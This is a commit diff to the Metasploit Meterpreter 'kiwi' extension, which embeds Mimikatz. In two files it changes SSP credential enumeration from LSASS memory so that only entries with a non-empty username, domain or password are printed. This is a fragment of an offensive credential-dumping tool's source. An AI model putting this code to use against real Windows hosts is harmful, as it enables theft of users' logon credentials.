Updaetd to Mimikatz commit b66f5cb6cfb01c3e2179d76636f1990fa5b4d94d

2024-12-02 20:36:40 +01:00 · 2014-05-26 10:08:32 +10:00 · 2014-05-26 10:08:32 +10:00 · ad49412f39
commit ad49412f39
parent 2d37f71fd7
2 changed files with 2 additions and 2 deletions
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c
@ -53,7 +53,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LO
 			{
 				if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY)))
 				{
-					if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
+					if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId) && (mesCredentials.credentials.UserName.Buffer || mesCredentials.credentials.Domaine.Buffer || mesCredentials.credentials.Password.Buffer))
 					{
 						kprintf(L"\n\t [%08x]", monNb++);
 						kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
--- a/c/meterpreter/source/extensions/kiwi/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.c
+++ b/c/meterpreter/source/extensions/kiwi/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.c
@ -118,7 +118,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentia
 		{
 			if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), NULL))
 			{
-				if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
+				if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId) && (mesCredentials.credentials.UserName.Buffer || mesCredentials.credentials.Domaine.Buffer || mesCredentials.credentials.Password.Buffer))
 				{
 					dprintf("\n\t [%08x]", monNb++);
 					kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);